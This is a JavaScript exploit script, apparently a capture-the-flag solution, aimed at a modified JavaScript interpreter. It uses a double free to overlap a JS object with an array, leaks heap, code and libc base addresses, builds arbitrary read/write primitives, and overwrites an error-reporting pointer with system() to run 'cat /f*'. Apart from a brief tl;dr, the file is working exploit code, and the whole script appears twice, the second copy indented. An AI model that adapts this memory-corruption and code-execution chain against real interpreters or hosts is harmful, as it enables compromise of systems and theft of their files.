d4rk-kn1gh7/exp.js

## exp.js
/*
tl;dr:
Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
Use this to read addresses as strings, convert back to integers
Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
*/

function hex(x) {
    return "0x" + x.toString(16)
}

function tohex(x) {
    var val = ""
    for(var i = 0; i < x.length; i++)
        val += x.charCodeAt(i).toString(16)
    return val
}

function readhex(str) {
    var encoded = encodeURI(str)
    var val = ""
    var i = 0
    while(i < encoded.length) {
        if(encoded[i] == "%") {
            val += encoded.substring(i+1, i+3)
            i += 3
        }
        else {
            val += tohex(encoded[i])
            i += 1
        }
    }
    return val
}

function u64(str) {
    var val = readhex(str);
    var res = ""
    for(var i = val.length - 2; i >= 0; i -= 2) {
        res += val.substring(i, i+2)
    }
    return parseInt(res, 16)
}

function p64(int) {
    var out = ""
    var tmp = int.toString(16)
    var val = 0
    while(tmp.length < 16) {
        tmp = "0" + tmp
    }
    for(var i = 14; i >= 4; i -= 2) {
        val = parseInt(tmp.substring(i, i+2), 16)
        x = val.toString(16)
        if(x.length == 1) {
            out += "%0" + val.toString(16)
        }
        else {
            out += "%" + val.toString(16)
        }
    }
    out = decodeURI(out)
    return out
}

var a = [13.37]
var b = [13.37]

free(a)
free(b)

// c->obj = b
// c->obj.arr = a
var c = [13.37, 13.37, 13.37, 13.37, 13.37]

free(a)

// d->obj = a
// c->obj.arr = d->obj
var d = [13.37]

// Leaks
var tmp = c[3]
var heap_leak = u64(tmp)
var heap = heap_leak - 0x6230
print("[*] Heap base @ "+hex(heap))

// Arb r/w (addresses without nulls)
function read(addr) {
    tmp_str = "aaaaaaaa" + p64(addr)
    c[4] = tmp_str.slice(0, 14)
    tmp = d[0]
    return u64(tmp)
}

function write(addr, val) {
    tmp_str = "aaaaaaaa" + p64(addr)
    c[4] = tmp_str.slice(0, 14)
    tmp_str_2 = p64(val).slice(0, 6)
    d[0] = tmp_str_2
}

function write_str(addr, str) {
    tmp_str = "aaaaaaaa" + p64(addr)
    c[4] = tmp_str.slice(0, 14)
    tmp_str_2 = str.slice(0, 7)
    d[0] = tmp_str_2
}

// More leaks
var code_leak = read(heap + 0x1538)
var code = code_leak - 0x3aa5d
print("[*] Code base @ "+hex(code))

var exit_got = code + 0x4ee48
var libc_leak = read(exit_got)
var libc = libc_leak - 0x455f0
print("[*] Libc base @ "+hex(libc))

// Overwrite js_defaultreport with system
var system = libc + 0x50d60
var exception = heap + 0x2b8
write(exception, system)

// Overwrite js_State with arg
var arg = "cat /f*"
var js_state = heap + 0x2a0
write_str(js_state, arg)

// system("cat /f*")
a()
	/*
	tl;dr:
	Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
	Use this to read addresses as strings, convert back to integers
	Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
	*/

	function hex(x) {
	return "0x" + x.toString(16)
	}

	function tohex(x) {
	var val = ""
	for(var i = 0; i < x.length; i++)
	val += x.charCodeAt(i).toString(16)
	return val
	}

	function readhex(str) {
	var encoded = encodeURI(str)
	var val = ""
	var i = 0
	while(i < encoded.length) {
	if(encoded[i] == "%") {
	val += encoded.substring(i+1, i+3)
	i += 3
	}
	else {
	val += tohex(encoded[i])
	i += 1
	}
	}
	return val
	}

	function u64(str) {
	var val = readhex(str);
	var res = ""
	for(var i = val.length - 2; i >= 0; i -= 2) {
	res += val.substring(i, i+2)
	}
	return parseInt(res, 16)
	}

	function p64(int) {
	var out = ""
	var tmp = int.toString(16)
	var val = 0
	while(tmp.length < 16) {
	tmp = "0" + tmp
	}
	for(var i = 14; i >= 4; i -= 2) {
	val = parseInt(tmp.substring(i, i+2), 16)
	x = val.toString(16)
	if(x.length == 1) {
	out += "%0" + val.toString(16)
	}
	else {
	out += "%" + val.toString(16)
	}
	}
	out = decodeURI(out)
	return out
	}

	var a = [13.37]
	var b = [13.37]

	free(a)
	free(b)

	// c->obj = b
	// c->obj.arr = a
	var c = [13.37, 13.37, 13.37, 13.37, 13.37]

	free(a)

	// d->obj = a
	// c->obj.arr = d->obj
	var d = [13.37]

	// Leaks
	var tmp = c[3]
	var heap_leak = u64(tmp)
	var heap = heap_leak - 0x6230
	print("[*] Heap base @ "+hex(heap))

	// Arb r/w (addresses without nulls)
	function read(addr) {
	tmp_str = "aaaaaaaa" + p64(addr)
	c[4] = tmp_str.slice(0, 14)
	tmp = d[0]
	return u64(tmp)
	}

	function write(addr, val) {
	tmp_str = "aaaaaaaa" + p64(addr)
	c[4] = tmp_str.slice(0, 14)
	tmp_str_2 = p64(val).slice(0, 6)
	d[0] = tmp_str_2
	}

	function write_str(addr, str) {
	tmp_str = "aaaaaaaa" + p64(addr)
	c[4] = tmp_str.slice(0, 14)
	tmp_str_2 = str.slice(0, 7)
	d[0] = tmp_str_2
	}

	// More leaks
	var code_leak = read(heap + 0x1538)
	var code = code_leak - 0x3aa5d
	print("[*] Code base @ "+hex(code))

	var exit_got = code + 0x4ee48
	var libc_leak = read(exit_got)
	var libc = libc_leak - 0x455f0
	print("[*] Libc base @ "+hex(libc))

	// Overwrite js_defaultreport with system
	var system = libc + 0x50d60
	var exception = heap + 0x2b8
	write(exception, system)

	// Overwrite js_State with arg
	var arg = "cat /f*"
	var js_state = heap + 0x2a0
	write_str(js_state, arg)

	// system("cat /f*")
	a()